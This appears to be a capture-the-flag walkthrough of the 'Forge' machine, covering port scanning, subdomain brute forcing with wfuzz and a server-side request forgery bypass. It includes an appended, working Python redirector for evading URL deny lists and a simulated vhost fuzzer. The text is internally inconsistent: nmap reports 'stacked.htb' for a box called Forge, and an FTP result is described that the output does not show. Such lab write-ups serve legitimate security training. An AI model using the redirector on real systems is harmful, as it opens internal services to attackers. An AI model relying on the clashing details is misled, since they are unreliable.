The website on Forge has a server-side request forgery (SSRF) vulnerability that I can use to access the admin site, available only from localhost. But to do that, I have to bypass a deny list of terms in the given URL. I’ll have the server contact me, and return a redirect to the site I actually want to have it visit. From the admin site, I can see that it too has an SSRF, and it can manage FTP as well. I’ll update my redirect to have it fetch files from the local FTP server, including the user flag and the user’s SSH private key. The user is able to run a Python script as root, and because of how this script uses PDB (the Python debugger), I can exploit the crash to get a shell as root. In Beyond Root, I’ll look at bypassing the filter, and explore the webserver configuration to figure out how the webserver talks FTP.

Nmap found two open TCP ports, SSH (22) and HTTP (80):

```
nmap -p- --min-rate 10000 -oA scans/nmap-alltcp 10.10.11.111
Warning: 10.10.11.111 giving up on port because retransmission cap hit (10).
Nmap scan report for stacked.htb (10.10.11.111)
...
22/tcp open ssh
80/tcp open http
...
Nmap done: 1 IP address (1 host up) scanned in 92.16 seconds
```

```
nmap -p 22,80 -sCV -oA scans/nmap-tcpscripts 10.10.11.111
...
22/tcp open ssh  OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to
Service Info: Host: 10.10.11.111; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up) scanned in 10.20 seconds
```

Nmap also reports the FTP port as filtered rather than closed. This is likely a firewall, and that means that FTP is likely running behind it.

Based on the OpenSSH and Apache versions, the host is likely running Ubuntu 20.04 Focal. Nmap also notes that the site returns a redirect, which gives me the domain name for the box.

Given the use of the domain name, I’ll start a brute force run for subdomains using wfuzz. I’ll start it with no filtering to get a feel for the default case. The -H "Host: " option will try the request with different Host headers, and I can look for any response that doesn’t match the default case. The number of characters changes based on the length of the subdomain, but the number of words does not, so I’ll use -hw 26 to hide every response with 26 words:

```
wfuzz -u -H "Host: " -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -hw 26
```

I’ll add both the domain and the subdomain to /etc/hosts.
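The redirect trick from the overview (the vulnerable server is given a URL pointing at a host I control, which answers with a 302 to the real destination, so none of the deny-listed terms ever appear in the URL I submit), as an added example that is not code from the original post. It uses only the Python 3 standard library; the bind address, the port and the placeholder target `http://localhost/` are assumptions for the example, not values taken from the box.

```python
"""Minimal redirector for the SSRF deny-list bypass: the target fetches
http://<my-host>:<port>/ and is sent on to the real destination.
Added example, standard library only; the target URL is a placeholder
assumption, not a value from the box."""
import sys
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer


def make_handler(target: str):
    """Build a handler class that answers every request with 302 -> target."""

    class RedirectHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            # The incoming request is the proof that the vulnerable server
            # reached out to us; answer with a redirect to where we want it.
            self.send_response(302)
            self.send_header("Location", target)
            self.send_header("Content-Length", "0")
            self.end_headers()

        def log_message(self, fmt, *args):
            # Log the callback so the SSRF is visible even if it returns nothing.
            sys.stderr.write("callback from %s: %s\n" % (self.client_address[0], fmt % args))

    return RedirectHandler


def start_redirector(target: str, bind: str = "127.0.0.1", port: int = 0) -> ThreadingHTTPServer:
    """Start the redirector in a background thread; port 0 picks a free port."""
    server = ThreadingHTTPServer((bind, port), make_handler(target))
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Opener helper that refuses to follow redirects so we can inspect them."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def probe(url: str):
    """Fetch url without following redirects; return (status, Location header)."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(url, timeout=5) as resp:
            return resp.getcode(), resp.headers.get("Location")
    except urllib.error.HTTPError as err:
        # With redirects disabled urllib raises HTTPError for the 302 itself.
        return err.code, err.headers.get("Location")


if __name__ == "__main__":
    # usage: python3 redirector.py <port> <target-url>
    # placeholder target: the admin site is only reachable from localhost
    listen_port = int(sys.argv[1]) if len(sys.argv) > 1 else 8000
    target_url = sys.argv[2] if len(sys.argv) > 2 else "http://localhost/"
    print(f"redirecting everything on :{listen_port} to {target_url}")
    ThreadingHTTPServer(("0.0.0.0", listen_port), make_handler(target_url)).serve_forever()
```

The URL handed to the vulnerable application only ever names my host, so a deny list that inspects that string has nothing to match; the restricted hostname lives in the Location header my server returns. `probe` is there to check the redirector from my own machine before pointing the target at it.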
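The filtering logic behind the subdomain brute force (hide every response whose word count matches the default case, which is what wfuzz's -hw does), as an added example that is neither code from the original post nor from wfuzz. The domain `example.htb`, the hidden vhost `admin.example.htb` and both response bodies are constructed for the example; the default body is an Apache-style redirect that echoes the Host header, so its length varies with the subdomain while its word count stays fixed.

```python
"""Word-count filtering for a Host-header brute force (the idea behind
wfuzz -hw). Added example; the domain, vhost and responses are constructed."""
import secrets
from typing import Callable, Dict, List, Tuple

Response = Tuple[int, str]

# Constructed default response: an Apache-style redirect that echoes the
# Host header, so chars vary with the subdomain but the word count does not.
DEFAULT_REDIRECT = (
    '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n'
    "<html><head>\n<title>302 Found</title>\n</head><body>\n<h1>Found</h1>\n"
    '<p>The document has moved <a href="http://{host}/">here</a>.</p>\n'
    "</body></html>\n"
)

# Constructed target: one hidden vhost, every other Host gets the redirect.
CONSTRUCTED_VHOSTS: Dict[str, Response] = {
    "admin.example.htb": (
        200,
        "<html><body><h1>Admin Portal</h1><p>Please log in.</p></body></html>",
    ),
}


def fake_fetch(host: str) -> Response:
    """Stand-in for an HTTP request sent with the given Host header."""
    if host in CONSTRUCTED_VHOSTS:
        return CONSTRUCTED_VHOSTS[host]
    return 302, DEFAULT_REDIRECT.format(host=host)


def metrics(resp: Response) -> Tuple[int, int, int, int]:
    """(status, chars, words, lines), the columns wfuzz prints per response."""
    status, body = resp
    return status, len(body), len(body.split()), body.count("\n")


def fuzz_vhosts(
    fetch: Callable[[str], Response],
    domain: str,
    wordlist: List[str],
    hide_words: int = None,
) -> List[Tuple[str, int, int, int, int]]:
    """Try each candidate as a Host header and keep only responses whose word
    count differs from the default case. With hide_words=None the baseline is
    measured from a random subdomain that should not exist (the "no filter,
    look at the default case" step done automatically)."""
    if hide_words is None:
        hide_words = metrics(fetch(f"{secrets.token_hex(6)}.{domain}"))[2]
    hits = []
    for sub in wordlist:
        host = f"{sub}.{domain}"
        status, chars, words, lines = metrics(fetch(host))
        if words != hide_words:
            hits.append((host, status, chars, words, lines))
    return hits


if __name__ == "__main__":
    for hit in fuzz_vhosts(fake_fetch, "example.htb", ["www", "admin", "dev", "mail"]):
        print("host=%s status=%d chars=%d words=%d lines=%d" % hit)
```

Filtering on characters (-hh) would fail here because every default response has a different length; the word count is the stable signal, which is why the post picks -hw. The random-baseline measurement is the one addition over the manual workflow: it removes the guesswork of reading the count off an unfiltered run.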